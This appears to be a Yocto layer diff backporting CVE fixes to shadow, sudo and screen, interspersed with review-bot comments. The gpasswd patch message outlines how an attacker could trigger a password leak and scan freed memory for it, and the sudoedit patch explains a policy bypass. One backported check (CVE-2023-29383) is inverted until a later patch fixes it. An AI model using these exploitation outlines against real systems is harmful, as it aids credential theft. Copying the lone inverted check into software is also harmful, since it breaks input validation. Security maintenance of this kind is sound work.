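Review bot: `queryflag = -1;` now runs only in the `else` branch, so when `CheckPid()` rejects the sender the flag keeps whatever the preceding lines assigned and is still set when the next message is handled. The old code reset it unconditionally after `Kill()`. To keep that behaviour, close the `else` block right after the `Kill(...)` call and leave `queryflag = -1;` at the outer level. The assignment that can leave `queryflag` non-negative is above the hunk, so how far the stale value matters has to be checked in `ReceiveMsg()` as a whole.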
diff --git a/meta/recipes-extended/screen/screen_4.8.0.bb b/meta/recipes-extended/screen/screen_4.8.0.bb
index 4772eb6c7a..c4faa27023 100644
--- a/meta/recipes-extended/screen/screen_4.8.0.bb
+++ b/meta/recipes-extended/screen/screen_4.8.0.bb
@@ -21,6 +21,8 @@ SRC_URI = "${GNU_MIRROR}/screen/screen-${PV}.tar.gz \
file://0002-comm.h-now-depends-on-term.h.patch \
file://0001-fix-for-multijob-build.patch \
file://0001-Remove-more-compatibility-stuff.patch \
+ file://CVE-2021-26937.patch \
+ file://CVE-2023-24626.patch \
"
SRC_URI[md5sum] = "d276213d3acd10339cd37848b8c4ab1e"
diff --git a/meta/recipes-extended/sed/sed_4.8.bb b/meta/recipes-extended/sed/sed_4.8.bb
index 39e3a61df5..089bd11a55 100644
--- a/meta/recipes-extended/sed/sed_4.8.bb
+++ b/meta/recipes-extended/sed/sed_4.8.bb
@@ -1,5 +1,6 @@
SUMMARY = "Stream EDitor (text filtering utility)"
HOMEPAGE = "http://www.gnu.org/software/sed/"
+DESCRIPTION = "sed (stream editor) is a non-interactive command-line text editor."
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=c678957b0c8e964aa6c70fd77641a71e \
file://sed/sed.h;beginline=1;endline=15;md5=fb3c7e6fbca6f66943859153d4be8efe \
diff --git a/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch
new file mode 100644
index 0000000000..aea07ff361
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch
@@ -0,0 +1,66 @@
+From 2eaea70111f65b16d55998386e4ceb4273c19eb4 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Christian=20G=C3=B6ttsche?= <cgzones@googlemail.com>
+Date: Fri, 31 Mar 2023 14:46:50 +0200
+Subject: [PATCH] Overhaul valid_field()
+
+e5905c4b ("Added control character check") introduced checking for
+control characters but had the logic inverted, so it rejects all
+characters that are not control ones.
+
+Cast the character to `unsigned char` before passing to the character
+checking functions to avoid UB.
+
+Use strpbrk(3) for the illegal character test and return early.
+
+Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/2eaea70111f65b16d55998386e4ceb4273c19eb4]
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/fields.c | 24 ++++++++++--------------
+ 1 file changed, 10 insertions(+), 14 deletions(-)
+
+diff --git a/lib/fields.c b/lib/fields.c
+index fb51b582..53929248 100644
+--- a/lib/fields.c
++++ b/lib/fields.c
+@@ -37,26 +37,22 @@ int valid_field (const char *field, const char *illegal)
+
+ /* For each character of field, search if it appears in the list
+ * of illegal characters. */
++ if (illegal && NULL != strpbrk (field, illegal)) {
++ return -1;
++ }
++
++ /* Search if there are non-printable or control characters */
+ for (cp = field; '\0' != *cp; cp++) {
+- if (strchr (illegal, *cp) != NULL) {
++ unsigned char c = *cp;
++ if (!isprint (c)) {
++ err = 1;
++ }
++ if (iscntrl (c)) {
+ err = -1;
+ break;
+ }
+ }
+
+- if (0 == err) {
+- /* Search if there are non-printable or control characters */
+- for (cp = field; '\0' != *cp; cp++) {
+- if (!isprint (*cp)) {
+- err = 1;
+- }
+- if (!iscntrl (*cp)) {
+- err = -1;
+- break;
+- }
+- }
+- }
+-
+ return err;
+ }
+
+--
+2.34.1
+
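Review bot: This patch carries no `CVE:` tag although it corrects the check that CVE-2023-29383.patch introduces. That file adds `if (!iscntrl (*cp))`, which returns -1 for every ordinary character, and only the `iscntrl (c)` form here makes the fix behave as its description says. Adding `CVE: CVE-2023-29383` to this header, or a line such as `Follow-up to CVE-2023-29383.patch, must be applied after it`, ties the two together so neither is dropped or reordered on its own. The recipe's SRC_URI order is not in view here and should list CVE-2023-29383.patch first, since this diff's context is that patch's result.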
diff --git a/meta/recipes-extended/shadow/files/CVE-2023-29383.patch b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch
new file mode 100644
index 0000000000..dbf4a508e9
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch
@@ -0,0 +1,54 @@
+From e5905c4b84d4fb90aefcd96ee618411ebfac663d Mon Sep 17 00:00:00 2001
+From: tomspiderlabs <128755403+tomspiderlabs@users.noreply.github.com>
+Date: Thu, 23 Mar 2023 23:39:38 +0000
+Subject: [PATCH] Added control character check
+
+Added control character check, returning -1 (to "err") if control characters are present.
+
+CVE: CVE-2023-29383
+Upstream-Status: Backport
+
+Reference to upstream:
+https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/fields.c | 11 +++++++----
+ 1 file changed, 7 insertions(+), 4 deletions(-)
+
+diff --git a/lib/fields.c b/lib/fields.c
+index 640be931..fb51b582 100644
+--- a/lib/fields.c
++++ b/lib/fields.c
+@@ -21,9 +21,9 @@
+ *
+ * The supplied field is scanned for non-printable and other illegal
+ * characters.
+- * + -1 is returned if an illegal character is present.
+- * + 1 is returned if no illegal characters are present, but the field
+- * contains a non-printable character.
++ * + -1 is returned if an illegal or control character is present.
++ * + 1 is returned if no illegal or control characters are present,
++ * but the field contains a non-printable character.
+ * + 0 is returned otherwise.
+ */
+ int valid_field (const char *field, const char *illegal)
+@@ -45,10 +45,13 @@ int valid_field (const char *field, const char *illegal)
+ }
+
+ if (0 == err) {
+- /* Search if there are some non-printable characters */
++ /* Search if there are non-printable or control characters */
+ for (cp = field; '\0' != *cp; cp++) {
+ if (!isprint (*cp)) {
+ err = 1;
++ }
++ if (!iscntrl (*cp)) {
++ err = -1;
+ break;
+ }
+ }
+--
+2.34.1
+
diff --git a/meta/recipes-extended/shadow/files/CVE-2023-4641.patch b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch
new file mode 100644
index 0000000000..75dbbad299
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch
@@ -0,0 +1,146 @@
+From 51731b01fd9a608397da22b7b9164e4996f3d4c6 Mon Sep 17 00:00:00 2001
+From: Alejandro Colomar <alx@kernel.org>
+Date: Sat, 10 Jun 2023 16:20:05 +0200
+Subject: [PATCH] gpasswd(1): Fix password leak
+
+CVE: CVE-2023-4641
+Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/65c88a43a23c2391dcc90c0abda3e839e9c57904]
+
+How to trigger this password leak?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+When gpasswd(1) asks for the new password, it asks twice (as is usual
+for confirming the new password). Each of those 2 password prompts
+uses agetpass() to get the password. If the second agetpass() fails,
+the first password, which has been copied into the 'static' buffer
+'pass' via STRFCPY(), wasn't being zeroed.
+
+agetpass() is defined in <./libmisc/agetpass.c> (around line 91), and
+can fail for any of the following reasons:
+
+- malloc(3) or readpassphrase(3) failure.
+
+ These are going to be difficult to trigger. Maybe getting the system
+ to the limits of memory utilization at that exact point, so that the
+ next malloc(3) gets ENOMEM, and possibly even the OOM is triggered.
+ About readpassphrase(3), ENFILE and EINTR seem the only plausible
+ ones, and EINTR probably requires privilege or being the same user;
+ but I wouldn't discard ENFILE so easily, if a process starts opening
+ files.
+
+- The password is longer than PASS_MAX.
+
+ The is plausible with physical access. However, at that point, a
+ keylogger will be a much simpler attack.
+
+And, the attacker must be able to know when the second password is being
+introduced, which is not going to be easy.
+
+How to read the password after the leak?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Provoking the leak yourself at the right point by entering a very long
+password is easy, and inspecting the process stack at that point should
+be doable. Try to find some consistent patterns.
+
+Then, search for those patterns in free memory, right after the victim
+leaks their password.
+
+Once you get the leak, a program should read all the free memory
+searching for patterns that gpasswd(1) leaves nearby the leaked
+password.
+
+On 6/10/23 03:14, Seth Arnold wrote:
+> An attacker process wouldn't be able to use malloc(3) for this task.
+> There's a handful of tools available for userspace to allocate memory:
+>
+> - brk / sbrk
+> - mmap MAP_ANONYMOUS
+> - mmap /dev/zero
+> - mmap some other file
+> - shm_open
+> - shmget
+>
+> Most of these return only pages of zeros to a process. Using mmap of an
+> existing file, you can get some of the contents of the file demand-loaded
+> into the memory space on the first use.
+>
+> The MAP_UNINITIALIZED flag only works if the kernel was compiled with
+> CONFIG_MMAP_ALLOW_UNINITIALIZED. This is rare.
+>
+> malloc(3) doesn't zero memory, to our collective frustration, but all the
+> garbage in the allocations is from previous allocations in the current
+> process. It isn't leftover from other processes.
+>
+> The avenues available for reading the memory:
+> - /dev/mem and /dev/kmem (requires root, not available with Secure Boot)
+> - /proc/pid/mem (requires ptrace privileges, mediated by YAMA)
+> - ptrace (requires ptrace privileges, mediated by YAMA)
+> - causing memory to be swapped to disk, and then inspecting the swap
+>
+> These all require a certain amount of privileges.
+
+How to fix it?
+~~~~~~~~~~~~~~
+
+memzero(), which internally calls explicit_bzero(3), or whatever
+alternative the system provides with a slightly different name, will
+make sure that the buffer is zeroed in memory, and optimizations are not
+allowed to impede this zeroing.
+
+This is not really 100% effective, since compilers may place copies of
+the string somewhere hidden in the stack. Those copies won't get zeroed
+by explicit_bzero(3). However, that's arguably a compiler bug, since
+compilers should make everything possible to avoid optimizing strings
+that are later passed to explicit_bzero(3). But we all know that
+sometimes it's impossible to have perfect knowledge in the compiler, so
+this is plausible. Nevertheless, there's nothing we can do against such
+issues, except minimizing the time such passwords are stored in plain
+text.
+
+Security concerns
+~~~~~~~~~~~~~~~~~
+
+We believe this isn't easy to exploit. Nevertheless, and since the fix
+is trivial, this fix should probably be applied soon, and backported to
+all supported distributions, to prevent someone else having more
+imagination than us to find a way.
+
+Affected versions
+~~~~~~~~~~~~~~~~~
+
+All. Bug introduced in shadow 19990709. That's the second commit in
+the git history.
+
+Fixes: 45c6603cc86c ("[svn-upgrade] Integrating new upstream version, shadow (19990709)")
+Reported-by: Alejandro Colomar <alx@kernel.org>
+Cc: Serge Hallyn <serge@hallyn.com>
+Cc: Iker Pedrosa <ipedrosa@redhat.com>
+Cc: Seth Arnold <seth.arnold@canonical.com>
+Cc: Christian Brauner <christian@brauner.io>
+Cc: Balint Reczey <rbalint@debian.org>
+Cc: Sam James <sam@gentoo.org>
+Cc: David Runge <dvzrv@archlinux.org>
+Cc: Andreas Jaeger <aj@suse.de>
+Cc: <~hallyn/shadow@lists.sr.ht>
+Signed-off-by: Alejandro Colomar <alx@kernel.org>
+Signed-off-by: Hugo SIMELIERE <hsimeliere.opensource@witekio.com>
+---
+ src/gpasswd.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/src/gpasswd.c b/src/gpasswd.c
+index 4d75af96..a698b32a 100644
+--- a/src/gpasswd.c
++++ b/src/gpasswd.c
+@@ -918,6 +918,7 @@ static void change_passwd (struct group *gr)
+ strzero (cp);
+ cp = getpass (_("Re-enter new password: "));
+ if (NULL == cp) {
++ memzero (pass, sizeof pass);
+ exit (1);
+ }
+
+--
+2.42.0
+
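Review bot: The added `memzero (pass, sizeof pass);` only protects the password if memzero in the 4.8.1 tree is a wipe the compiler cannot drop. The message says it calls explicit_bzero(3), but that describes upstream at the time of the fix, so it is worth confirming how the macro is defined in the version being patched. If it expands to a plain memset, a store to the static buffer immediately before `exit (1)` is a candidate for dead-store elimination and the backport would not close the leak. The message also speaks of agetpass() while the backported context calls `getpass`, so a line in the header saying the description was carried over from upstream and the hunk was adapted would save the next reader a search. change_passwd continues outside the hunk.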
diff --git a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
index 5f7ea00bf1..4e68f826c6 100644
--- a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
+++ b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb
@@ -2,7 +2,7 @@ SUMMARY = "Shadow utils requirements for useradd.bbclass"
HOMEPAGE = "http://github.com/shadow-maint/shadow"
BUGTRACKER = "http://github.com/shadow-maint/shadow/issues"
SECTION = "base utils"
-LICENSE = "BSD | Artistic-1.0"
+LICENSE = "BSD-3-Clause | Artistic-1.0"
LIC_FILES_CHKSUM = "file://login.defs_shadow-sysroot;md5=25e2f2de4dfc8f966ac5cdfce45cd7d5"
DEPENDS = "base-passwd"
diff --git a/meta/recipes-extended/shadow/shadow.inc b/meta/recipes-extended/shadow/shadow.inc
index f86e5e03c0..c16292c38a 100644
--- a/meta/recipes-extended/shadow/shadow.inc
+++ b/meta/recipes-extended/shadow/shadow.inc
@@ -1,8 +1,9 @@
SUMMARY = "Tools to change and administer password and group data"
HOMEPAGE = "http://github.com/shadow-maint/shadow"
+DESCRIPTION = "${SUMMARY}"
BUGTRACKER = "http://github.com/shadow-maint/shadow/issues"
SECTION = "base/utils"
-LICENSE = "BSD | Artistic-1.0"
+LICENSE = "BSD-3-Clause | Artistic-1.0"
LIC_FILES_CHKSUM = "file://COPYING;md5=ed80ff1c2b40843cf5768e5229cf16e5 \
file://src/passwd.c;beginline=2;endline=30;md5=5720ff729a6ff39ecc9f64555d75f4af"
@@ -13,6 +14,9 @@ SRC_URI = "https://github.com/shadow-maint/shadow/releases/download/${PV}/${BP}.
file://shadow-4.1.3-dots-in-usernames.patch \
${@bb.utils.contains('PACKAGECONFIG', 'pam', '${PAM_SRC_URI}', '', d)} \
file://shadow-relaxed-usernames.patch \
+ file://CVE-2023-29383.patch \
+ file://0001-Overhaul-valid_field.patch \
+ file://CVE-2023-4641.patch \
"
SRC_URI_append_class-target = " \
diff --git a/meta/recipes-extended/shadow/shadow_4.8.1.bb b/meta/recipes-extended/shadow/shadow_4.8.1.bb
index c975395ff8..9dfcd4bc10 100644
--- a/meta/recipes-extended/shadow/shadow_4.8.1.bb
+++ b/meta/recipes-extended/shadow/shadow_4.8.1.bb
@@ -6,5 +6,10 @@ BUILD_LDFLAGS_append_class-target = " ${@bb.utils.contains('DISTRO_FEATURES', 'p
BBCLASSEXTEND = "native nativesdk"
+# Severity is low and marked as closed and won't fix.
+# https://bugzilla.redhat.com/show_bug.cgi?id=884658
+CVE_CHECK_WHITELIST += "CVE-2013-4235"
+# This is an issue for a different shadow
+CVE_CHECK_WHITELIST += "CVE-2016-15024"
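Review bot: The justification for the second entry, `# This is an issue for a different shadow`, gives a reader nothing to verify, unlike the entry above it, which links its bug report. Since a whitelist entry silences the CVE checker for every image built from this layer, the comment should name the product the CVE is filed against and cite a source, e.g. `# CVE-2016-15024 applies to <other product>, not shadow-maint/shadow: <reference URL>`. The first entry is a different case: CVE-2013-4235 is whitelisted as won't-fix rather than not-applicable, so its comment should say that the shipped shadow remains affected.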
diff --git a/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch
new file mode 100644
index 0000000000..9dfca0441b
--- /dev/null
+++ b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch
@@ -0,0 +1,26 @@
+From 2386cd8f907b379ae5cc1ce2888abef7d30e709a Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Sat, 23 Oct 2021 20:20:59 +0200
+Subject: [PATCH] Makefile: do not write the timestamp into compressed manpage.
+
+This helps reproducibility.
+
+Upstream-Status: Submitted [https://github.com/ColinIanKing/stress-ng/pull/156]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+---
+ Makefile | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Makefile b/Makefile
+index 886018f9..f4290f9c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -412,7 +412,7 @@ git-commit-id.h:
+ $(OBJS): stress-ng.h Makefile
+
+ stress-ng.1.gz: stress-ng.1
+- gzip -c $< > $@
++ gzip -n -c $< > $@
+
+ .PHONY: dist
+ dist:
diff --git a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
index 9b987c7bde..cf94e0275b 100644
--- a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
+++ b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
@@ -5,11 +5,12 @@ HOMEPAGE = "https://kernel.ubuntu.com/~cking/stress-ng/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \
+SRC_URI = "git://github.com/ColinIanKing/stress-ng.git;protocol=https;branch=master \
file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \
+ file://0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch \
"
-SRC_URI[md5sum] = "7b89157c838f2bb4bdeba8f46e3c56ae"
-SRC_URI[sha256sum] = "860291dd3a18b985b3483190a627bbede2b5c52113766c1921001b3fb4b83af0"
+SRCREV = "e045bcd711178c11b7e797ef6b4c524658468596"
+S = "${WORKDIR}/git"
DEPENDS = "coreutils-native"
diff --git a/meta/recipes-extended/sudo/files/CVE-2023-22809.patch b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch
new file mode 100644
index 0000000000..6c47eb3e44
--- /dev/null
+++ b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch
@@ -0,0 +1,113 @@
+Backport of:
+
+# HG changeset patch
+# Parent 7275148cad1f8cd3c350026460acc4d6ad349c3a
+sudoedit: do not permit editor arguments to include "--"
+We use "--" to separate the editor and arguments from the files to edit.
+If the editor arguments include "--", sudo can be tricked into allowing
+the user to edit a file not permitted by the security policy.
+Thanks to Matthieu Barjole and Victor Cutillas of Synacktiv
+(https://synacktiv.com) for finding this bug.
+
+CVE: CVE-2023-22809
+Upstream-Staus: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.8.31-1ubuntu1.4.debian.tar.xz]
+Signed-off-by: Omkar Patil <omkar.patil@kpit.com>
+
+--- a/plugins/sudoers/editor.c
++++ b/plugins/sudoers/editor.c
+@@ -56,7 +56,7 @@ resolve_editor(const char *ed, size_t ed
+ const char *cp, *ep, *tmp;
+ const char *edend = ed + edlen;
+ struct stat user_editor_sb;
+- int nargc;
++ int nargc = 0;
+ debug_decl(resolve_editor, SUDOERS_DEBUG_UTIL)
+
+ /*
+@@ -102,6 +102,21 @@ resolve_editor(const char *ed, size_t ed
+ free(editor_path);
+ while (nargc--)
+ free(nargv[nargc]);
++ free(nargv);
++ debug_return_str(NULL);
++ }
++
++ /*
++ * We use "--" to separate the editor and arguments from the files
++ * to edit. The editor arguments themselves may not contain "--".
++ */
++ if (strcmp(nargv[nargc], "--") == 0) {
++ sudo_warnx(U_("ignoring editor: %.*s"), (int)edlen, ed);
++ sudo_warnx("%s", U_("editor arguments may not contain \"--\""));
++ errno = EINVAL;
++ free(editor_path);
++ while (nargc--)
++ free(nargv[nargc]);
+ free(nargv);
+ debug_return_str(NULL);
+ }
+--- a/plugins/sudoers/sudoers.c
++++ b/plugins/sudoers/sudoers.c
+@@ -616,20 +616,31 @@ sudoers_policy_main(int argc, char * con
+
+ /* Note: must call audit before uid change. */
+ if (ISSET(sudo_mode, MODE_EDIT)) {
++ const char *env_editor = NULL;
+ int edit_argc;
+- const char *env_editor;
+
+ free(safe_cmnd);
+ safe_cmnd = find_editor(NewArgc - 1, NewArgv + 1, &edit_argc,
+ &edit_argv, NULL, &env_editor, false);
+ if (safe_cmnd == NULL) {
+- if (errno != ENOENT)
++ switch (errno) {
++ case ENOENT:
++ audit_failure(NewArgc, NewArgv, N_("%s: command not found"),
++ env_editor ? env_editor : def_editor);
++ sudo_warnx(U_("%s: command not found"),
++ env_editor ? env_editor : def_editor);
++ goto bad;
++ case EINVAL:
++ if (def_env_editor && env_editor != NULL) {
++ /* User tried to do something funny with the editor. */
++ log_warningx(SLOG_NO_STDERR|SLOG_SEND_MAIL,
++ "invalid user-specified editor: %s", env_editor);
++ goto bad;
++ }
++ /* FALLTHROUGH */
++ default:
+ goto done;
+- audit_failure(NewArgc, NewArgv, N_("%s: command not found"),
+- env_editor ? env_editor : def_editor);
+- sudo_warnx(U_("%s: command not found"),
+- env_editor ? env_editor : def_editor);
+- goto bad;
++ }
+ }
+ if (audit_success(edit_argc, edit_argv) != 0 && !def_ignore_audit_errors)
+ goto done;
+--- a/plugins/sudoers/visudo.c
++++ b/plugins/sudoers/visudo.c
+@@ -308,7 +308,7 @@ static char *
+ get_editor(int *editor_argc, char ***editor_argv)
+ {
+ char *editor_path = NULL, **whitelist = NULL;
+- const char *env_editor;
++ const char *env_editor = NULL;
+ static char *files[] = { "+1", "sudoers" };
+ unsigned int whitelist_len = 0;
+ debug_decl(get_editor, SUDOERS_DEBUG_UTIL)
+@@ -342,7 +342,11 @@ get_editor(int *editor_argc, char ***edi
+ if (editor_path == NULL) {
+ if (def_env_editor && env_editor != NULL) {
+ /* We are honoring $EDITOR so this is a fatal error. */
+- sudo_fatalx(U_("specified editor (%s) doesn't exist"), env_editor);
++ if (errno == ENOENT) {
++ sudo_warnx(U_("specified editor (%s) doesn't exist"),
++ env_editor);
++ }
++ exit(EXIT_FAILURE);
+ }
+ sudo_fatalx(U_("no editor found (editor path = %s)"), def_editor);
+ }
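Review bot: The header tag on this backport is spelled `Upstream-Staus:`, so tooling that looks for `Upstream-Status:` will not recognise it; the line should read `Upstream-Status: Backport [...]` with the same reference. In the sudoers.c hunk the `ENOENT` branch calls `audit_failure` before `goto bad`, while the new `EINVAL` branch for a rejected user-specified editor only calls `log_warningx`. Whether that rejection also reaches the audit trail is not visible from these hunks and is worth confirming, since it is the path that records an attempted policy bypass. A short comment on the `EINVAL` case saying that errno is set by the `--` check in resolve_editor would tie the two files together for the next reader.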
diff --git a/meta/recipes-extended/sudo/sudo.inc b/meta/recipes-extended/sudo/sudo.inc
index 5d27d46928..9c7279d25a 100644
--- a/meta/recipes-extended/sudo/sudo.inc
+++ b/meta/recipes-extended/sudo/sudo.inc
@@ -3,8 +3,8 @@ DESCRIPTION = "Sudo (superuser do) allows a system administrator to give certain
HOMEPAGE = "http://www.sudo.ws"
BUGTRACKER = "http://www.sudo.ws/bugs/"
SECTION = "admin"
-LICENSE = "ISC & BSD & Zlib"
-LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=4d1b44b1576eea036d78b8cc961aa93d \
+LICENSE = "ISC & BSD-3-Clause & BSD-2-Clause & Zlib"
+LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=07966675feaddba70cc812895b248230 \
file://plugins/sudoers/redblack.c;beginline=1;endline=46;md5=03e35317699ba00b496251e0dfe9f109 \
file://lib/util/reallocarray.c;beginline=3;endline=15;md5=397dd45c7683e90b9f8bf24638cf03bf \
file://lib/util/fnmatch.c;beginline=3;endline=27;md5=004d7d2866ba1f5b41174906849d2e0f \
@@ -49,3 +49,5 @@ do_compile_prepend () {
do_install_prepend (){
mkdir -p ${D}/${localstatedir}/lib
}
+
+CVE_VERSION_SUFFIX = "patch"
diff --git a/meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch b/meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch
new file mode 100644
index 0000000000..6ee2d5c11e
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch
@@ -0,0 +1,29 @@
+From f4e9e4337f8844d199515ff2b762c914dd254cbd Mon Sep 17 00:00:00 2001
+From: Dan Robertson <dan@dlrobertson.com>
+Date: Sat, 16 May 2020 00:12:44 +0000
+Subject: [PATCH] Fix includes when building with musl
+
+Include sys/types.h for mode_t and id_t in sudo_debug.h
+
+Upstream-Status: Backport [https://github.com/sudo-project/sudo/commit/f4e9e4337f8844d199515ff2b762c914dd254cbd]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ include/sudo_debug.h | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/include/sudo_debug.h b/include/sudo_debug.h
+index 180f2096f..0124b0b19 100644
+--- a/include/sudo_debug.h
++++ b/include/sudo_debug.h
+@@ -25,6 +25,7 @@
+ #else
+ # include "compat/stdbool.h"
+ #endif
++#include <sys/types.h>
+ #include "sudo_queue.h"
+
+ /*
+--
+2.25.1
+
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch
new file mode 100644
index 0000000000..1336c7701d
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch
@@ -0,0 +1,59 @@
+From e1554d7996a59bf69544f3d8dd4ae683027948f9 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 15 Nov 2022 09:17:18 +0530
+Subject: [PATCH] CVE-2022-43995
+
+Upstream-Status: Backport [https://github.com/sudo-project/sudo/commit/bd209b9f16fcd1270c13db27ae3329c677d48050]
+CVE: CVE-2022-43995
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+Potential heap overflow for passwords < 8
+characters. Starting with sudo 1.8.0 the plaintext password buffer is
+dynamically sized so it is not safe to assume that it is at least 9 bytes in
+size.
+Found by Hugo Lefeuvre (University of Manchester) with ConfFuzz.
+---
+ plugins/sudoers/auth/passwd.c | 11 +++++------
+ 1 file changed, 5 insertions(+), 6 deletions(-)
+
+diff --git a/plugins/sudoers/auth/passwd.c b/plugins/sudoers/auth/passwd.c
+index 03c7a16..76a7824 100644
+--- a/plugins/sudoers/auth/passwd.c
++++ b/plugins/sudoers/auth/passwd.c
+@@ -63,7 +63,7 @@ sudo_passwd_init(struct passwd *pw, sudo_auth *auth)
+ int
+ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_conv_callback *callback)
+ {
+- char sav, *epass;
++ char des_pass[9], *epass;
+ char *pw_epasswd = auth->data;
+ size_t pw_len;
+ int matched = 0;
+@@ -75,12 +75,12 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c
+
+ /*
+ * Truncate to 8 chars if standard DES since not all crypt()'s do this.
+- * If this turns out not to be safe we will have to use OS #ifdef's (sigh).
+ */
+- sav = pass[8];
+ pw_len = strlen(pw_epasswd);
+- if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len))
+- pass[8] = '\0';
++ if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len)) {
++ strlcpy(des_pass, pass, sizeof(des_pass));
++ pass = des_pass;
++ }
+
+ /*
+ * Normal UN*X password check.
+@@ -88,7 +88,6 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c
+ * only compare the first DESLEN characters in that case.
+ */
+ epass = (char *) crypt(pass, pw_epasswd);
+- pass[8] = sav;
+ if (epass != NULL) {
+ if (HAS_AGEINFO(pw_epasswd, pw_len) && strlen(epass) == DESLEN)
+ matched = !strncmp(pw_epasswd, epass, DESLEN);
+--
+2.25.1
+
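Review bot: The new stack buffer `des_pass` receives a copy of up to eight plaintext password characters and nothing in the visible hunks clears it after `crypt()` returns. The rest of sudo_passwd_verify is outside the hunk, so this needs checking against the full function, but the diffstat of 5 insertions is fully accounted for by the lines shown, which suggests no wipe was added. If that is the case, add `explicit_bzero(des_pass, sizeof(des_pass));` (or the wipe helper this tree provides) after the comparison and before the function returns, so the truncated password does not linger in the stack frame.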
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch
new file mode 100644
index 0000000000..bc6f8c19a6
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch
@@ -0,0 +1,646 @@
+Origin: Backport obtained from SUSE. Thanks!
+
+From 334daf92b31b79ce68ed75e2ee14fca265f029ca Mon Sep 17 00:00:00 2001
+From: "Todd C. Miller" <Todd.Miller@sudo.ws>
+Date: Wed, 18 Jan 2023 08:21:34 -0700
+Subject: [PATCH] Escape control characters in log messages and "sudoreplay -l"
+ output. The log message contains user-controlled strings that could include
+ things like terminal control characters. Space characters in the command
+ path are now also escaped.
+
+Command line arguments that contain spaces are surrounded with
+single quotes and any literal single quote or backslash characters
+are escaped with a backslash. This makes it possible to distinguish
+multiple command line arguments from a single argument that contains
+spaces.
+
+Issue found by Matthieu Barjole and Victor Cutillas of Synacktiv
+(https://synacktiv.com).
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/sudo-project/sudo/commit/334daf92b31b79ce68ed75e2ee14fca265f029ca]
+CVE: CVE-2023-28486 CVE-2023-28487
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ doc/sudoers.man.in | 33 +++++++--
+ doc/sudoers.mdoc.in | 28 ++++++--
+ doc/sudoreplay.man.in | 9 ++
+ doc/sudoreplay.mdoc.in | 10 ++
+ include/sudo_compat.h | 6 +
